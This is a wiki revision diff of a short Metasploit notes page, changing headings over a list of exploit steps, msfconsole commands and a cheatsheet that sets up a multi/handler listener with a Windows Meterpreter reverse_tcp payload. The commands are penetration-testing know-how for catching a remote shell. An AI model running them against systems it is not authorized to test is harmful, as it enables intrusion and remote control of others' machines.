MSF: Difference between revisions

Content added Content deleted
No edit summary
No edit summary
 
Line 1: Line 1:
[[Category:Hacking]]
[[Category:Hacking]]
__TOC__


= Overview =
=Metasploit=
Steps:
Steps:
1. Pick which exploit to use
1. Pick which exploit to use
Line 9: Line 10:
5. Execute the exploit
5. Execute the exploit


Common Commands:
= Common Commands =
msfconsole
msfconsole
show expolit windows
show expolit windows
Line 25: Line 26:
exploit
exploit


==MSF Complete Cheatsheet==
= Complete Cheatsheet =
use exploit/multi/handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set PAYLOAD windows/meterpreter/reverse_tcp